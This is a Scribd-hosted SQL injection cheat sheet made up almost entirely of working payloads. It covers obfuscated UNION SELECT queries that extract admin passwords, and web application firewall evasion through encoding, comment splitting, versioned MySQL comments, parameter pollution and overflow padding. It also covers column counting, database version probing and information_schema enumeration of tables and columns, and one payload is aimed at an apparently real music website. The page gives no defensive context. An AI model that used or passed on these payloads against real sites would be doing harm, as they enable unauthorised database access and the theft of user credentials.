Scribd
Upload
87 views10 pages

Are Bypassing The WAF /select/ /1,2,3,4,5

The document contains examples of SQL injection payloads targeting various vulnerabilities like bypassing input validation, retrieving data from databases, detecting database versions, and bypassing web application firewalls. The payloads use techniques like SQL comments, encoding, concatenation and information schema tables to evade defenses. The goal is to extract sensitive information like user passwords or version details from backend databases.

Uploaded by

FrancisJohnCabiles
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
87 views10 pages

Are Bypassing The WAF /select/ /1,2,3,4,5

The document contains examples of SQL injection payloads targeting various vulnerabilities like bypassing input validation, retrieving data from databases, detecting database versions, and bypassing web application firewalls. The payloads use techniques like SQL comments, encoding, concatenation and information schema tables to evade defenses. The goal is to extract sensitive information like user passwords or version details from backend databases.

Uploaded by

FrancisJohnCabiles
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
You are on page 1/ 10

'/**/UNION/**/SELECT/**/password/**/FROM/**/Users/**

/WHERE/**/username/**/
LIKE/**/'admin'-'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/**/OM/**
/Users/**/WHE/**/RE/**/
username/**/LIKE/**/'admin'-'%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/password
%2f%2a*/FROM%2f%2a*/Users%2f%2a*/
WHERE%2f%2a*/username%2f%2a*/LIKE%2f
%2a*/'admin'-'%252f%252a*/UNION%252f%252a*/SELECT%252f
%252a*/password%252f%252a*/
FROM%252f%252a*/Users%252f%252a*/WHERE
%252f%252a*/username%252f%252a*/
LIKE%252f%252a*/'admin'--

www.site.com/a.php?id=123 uNiOn All sEleCt/*We


are bypassing the WAF*/select/**/1,2,3,4,5-http://site.org.uk/News/view.php?id=-26/%2A%2A/union/
%2A%2A/select/%2A%2A/1,2,3,4,5 -http://site.org.uk/News/view.php?id=-26%2F**%2Funion

%2F**%2Fselect%2F**%2F1,2,3,4,5 -http://www.site.com/artigos-de-baralho-cigano.php?id=130+UnIoN+SeLselectECT+1,2,3,4,5,6,7,8,9-www.[site].com/index.php?id=1+uni*on+sel*ect+1,2,3,4--+site.vulnweb.com/showforum.asp?id=-1/* &id= */union/*


&id= */select/* &id= */1,2 -/* &c= */
/* &b= */
/* &id= */
/*&q=*/
/*&prodID=*/
/*&abc=*/
q=select
union /* and b=*/ select
q=select/*&q=*/
q=*/from/*
q=select/*&q=*/name&q=password/*&q=*/
&b= */select+1,2 /?a=1+ union/* &b= */
q=*/name q=password/*
?id=1 /**/union/* &id= */select/* &id= */pwd/* &id=
*/from/* &id= */users

site.org.uk/News/view.php?id=-26+%0A%0Dunion%0A
%0D+%0A%0Dselect%0A%0D+1,2,3,4,5

+and(/*!50000select*/ 1)=(/*!32302select*/
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+
Example in
http://www.punjab-dj.com/music/song.php?
cat=Punjabi&n==25799'+and(/*!50000select*/ 1)=(/*!
32302select*/
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA)+ and 0 union select

1,version(),3,4,5,6,7,8,9--+

getting column number


+group+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,
19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3
7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55
,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,
74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,9
2,93,94,95,96,97,98,99,100%23
+Order+By+100 -) order by 100-- ') order by 100-- ')order by 100%23%23
%')order by 100%23%23
Null' order by 100--+
Null' order by 100--+
'group by 100-- +group/**/by/**/100&#8211
'group/**/by/**/100%23%23
+PROCEDURE ANALYSE()
+and (select * from pages)=(select 1)

bypassing union
+%0A/**//*!50000%55nIOn*//**/%0A/*!32302%53eLEct*/
%0A+
=null%0A/**//*!50000%55nIOn*//**/%0A/*!
32302%53eLEct*/%0A+
+union%23aa%0Aselect+
--%0Aunion--%0Aselect--%0A@tmp:=
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
+%2F**%2Funion%2F**%2Fselect+
+UnIoN+SeLselectECT+
+UNIunionON+SELselectECT+
+#uNiOn+#sEleCt+
+--+Union+--+Select+--+
+union+distinct+select+
+union+distinctROW+select+
+union+(sELect'1','2','3')
+union(((((((select(1),(2),(3))))))))
=(1)unIon(selEct(1),(2),(3))
+UnIoN/*&a=*/SeLeCT/*&a=*/
/**/union/* &id= */select/* &id= */
%252f%252a*/UNION%252f%252a /SELECT%252f
%252a*/
getting version

Version 5

Example :
www.site.eg/php?id=1/*!50094aaaa*/ error
www.site.eg/php?id=1/*!50095aaaa*/ no error
www.site.eg/php?id=1/*!50096aaaa*/ error
www.site.eg/php?id=1+and
substring(version(),1,1)=5
www.site.eg/php?id=1+and
substring(version(),1,1)=10
www.site.eg/php?id=1+AND MID(VERSION(),1,1) =
'5';

version 4

Example :
www.site.eg/php?id=1/*!40123 1=1*/--+- no error
www.site.eg/php?id=1/*!40122rrrr*/ no error
www.site.eg/php?id=1+and
substring(version(),1,1)=4
www.site.eg/php?id=1+and
substring(version(),1,1)=9
www.site.eg/php?id=1+AND MID(VERSION(),1,1) =
'4';

Group & Concat

--%0ACoNcAt()
concat%00()
%00CoNcAt()
grOUp_ConCat(,0x3e,)
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)

Bypass with Information_schema.tables


there many method to Bypass
Information_schema.tables
[1] Spaces
information_schema . tables
[2] Backticks
`information_schema`.`tables`
[3] Specific Code
/*!information_schema.tables*/
[4] Encoded
FROM+information_schema%20%0C
%20.%20%09tables

[5] foo with `.`


(select+group_concat(table_name)`foo`+From+`info
rmation_schema`.`tAblES`+Where+table_ScHEmA
=schEMA())
[6] Alternative Names
information_schema.statistics
information_schema.key_column_usage
information_schema.table_constraints
information_schema.partitions

Get tables

/*!50000table_name*/
%0A/*!50000%46roM*/%0A/*!
50000%49nfORmaTion_scHema . tAblES*/%0A/*!
50000%57here*/%0Atable_ScHEmA=schEMA()
%0Alimit%0A0,1

In tables directly

(/*!50000%53elect*/%0A/*!50000%54able_name*/%0A
%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_
%53cHema . %54AblES*/%0A/*!50000%57here*/%0A
%54able_ScHEmA=schEMA()%0Alimit%0A0,1)

Get Columns

/*!50000column_name*/
%0A%46roM%0AInfORmaTion_scHema . cOlumnS
%0A%57heRe%0A/*!50000tAblE_naMe*/=hex table

You might also like